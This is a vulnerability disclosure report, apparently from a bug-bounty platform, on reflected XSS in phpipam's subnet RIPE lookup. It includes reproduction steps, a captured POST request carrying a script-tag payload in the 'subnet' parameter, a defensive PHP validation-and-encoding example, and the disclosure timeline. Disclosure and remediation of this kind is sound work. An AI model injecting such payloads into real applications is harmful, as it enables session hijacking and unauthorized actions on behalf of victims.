Cross-site Scripting (XSS) - Reflected in phpipam/phpipam

Valid

Reported on

Jan 28th 2022


Description

Reflected XSS attacks, also known as non-persistent attacks, occur when a malicious script is reflected off a web application into the victim's browser. The script is delivered through a link that sends a request to a vulnerable page, which returns the script in its response so the browser executes it. The vulnerability is typically the result of incoming request parameters not being sufficiently validated or encoded before they are written back into the page, which allows an attacker to manipulate the web application's output and trigger execution of arbitrary scripts in the victim's session.

Proof of Concept

Steps to Reproduce:
1. Log in to the web app using admin credentials.
2. Navigate to Subnets: "http://localhost/phpipam/index.php?page=subnets&section=1"
3. Choose any subnet and click Edit.
4. Click the "Get Information" button of the Subnet input field, capture the request with a proxy tool, and change the subnet IP to the XSS payload, as shown in my POST request below.

=======================================================================================

POST /phpipam/app/admin/subnets/ripe-query.php HTTP/1.1
Host: localhost
Content-Length: 47
sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Cookie: phpipam=keqtftn3sihc7kbu6m79rdlis0;
Connection: close

subnet=<script>alert(document.domain);</script>
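The request above shows the `subnet` parameter of the RIPE lookup being reflected into the response without encoding. The following is an added example (not phpipam's code and not the fix merged in 47c104) of the two server-side controls that close this class of bug in a PHP lookup endpoint: reject anything that is not an IP address or CIDR before it is used, and HTML-encode whatever is echoed back. The function names and the alert markup are illustrative assumptions.

```php
<?php
declare(strict_types=1);

// Added example, not phpipam code. Demonstrates input validation plus
// output encoding for a lookup endpoint that reflects its "subnet" parameter.

/** Return the normalised IP or CIDR string, or null if the value is neither. */
function parse_subnet_param(string $raw): ?string
{
    $value = trim($raw);
    $parts = explode('/', $value, 2);

    // The address part must be a syntactically valid IPv4 or IPv6 address.
    $ip = filter_var($parts[0], FILTER_VALIDATE_IP);
    if ($ip === false) {
        return null;
    }

    // An optional prefix length must be numeric and within range for the family.
    if (count($parts) === 2) {
        $isV6 = filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_IPV6) !== false;
        $maxPrefix = $isV6 ? 128 : 32;
        if (!ctype_digit($parts[1]) || (int) $parts[1] > $maxPrefix) {
            return null;
        }
        return $ip . '/' . (int) $parts[1];
    }
    return $ip;
}

/** Encode a value for an HTML text node; also safe inside a quoted attribute. */
function html_encode(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/** Build the response fragment. The error branch is where the original reflected raw input. */
function render_lookup_response(string $raw): string
{
    $subnet = parse_subnet_param($raw);
    if ($subnet === null) {
        // Vulnerable form: '... Invalid subnet: ' . $raw . ' ...'
        // Hardened form: the rejected input is encoded before it reaches the page.
        return '<div class="alert alert-danger">Invalid subnet: ' . html_encode($raw) . '</div>';
    }
    return '<div class="alert alert-success">Querying ' . html_encode($subnet) . '</div>';
}

// Constructed sample inputs, including the payload from the report above.
$cases = [
    '10.10.0.0/24',
    '2001:db8::/32',
    '<script>alert(document.domain);</script>',
    '10.0.0.1/99',
];
foreach ($cases as $case) {
    echo render_lookup_response($case), PHP_EOL;
}
```

Run with `php example.php`: the two well-formed inputs produce the success fragment, the script payload and the out-of-range prefix are rejected, and the rejected values appear in the output only as `&lt;script&gt;...` rather than as live markup. Validation alone would already have stopped this particular payload, but the encoding step is what protects every other place the value might be echoed.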

Impact

Perform any action within the application that the user can perform. View any information that the user is able to view. Modify any information that the user is able to modify. Initiate interactions with other application users, including malicious attacks, that will appear to originate from the initial victim user.

We are processing your report and will contact the phpipam team within 24 hours. 4 months ago
We have contacted a member of the phpipam team and are waiting to hear back 4 months ago
We have sent a follow up to the phpipam team. We will try again in 7 days. 4 months ago
We have sent a second follow up to the phpipam team. We will try again in 10 days. 4 months ago
We have sent a third and final follow up to the phpipam team. This report is now considered stale. 3 months ago
phpipam/phpipam maintainer has acknowledged this report 2 months ago
garyallan modified the report 2 months ago
garyallan modified the report 2 months ago
garyallan validated this vulnerability 2 months ago
AggressiveUser has been awarded the disclosure bounty
The fix bounty is now up for grabs
AggressiveUser (Researcher), 2 months ago:

@admin @maintainer can you assign a CVE ID if it's possible for this report

Jamie Slome (Admin), 2 months ago:

We sure can, we just need confirmation from the maintainer before we proceed with a CVE.

@maintainer - are you happy for us to assign and publish a CVE for this report?

garyallan confirmed that a fix has been merged on 47c104 2 months ago
garyallan has been awarded the fix bounty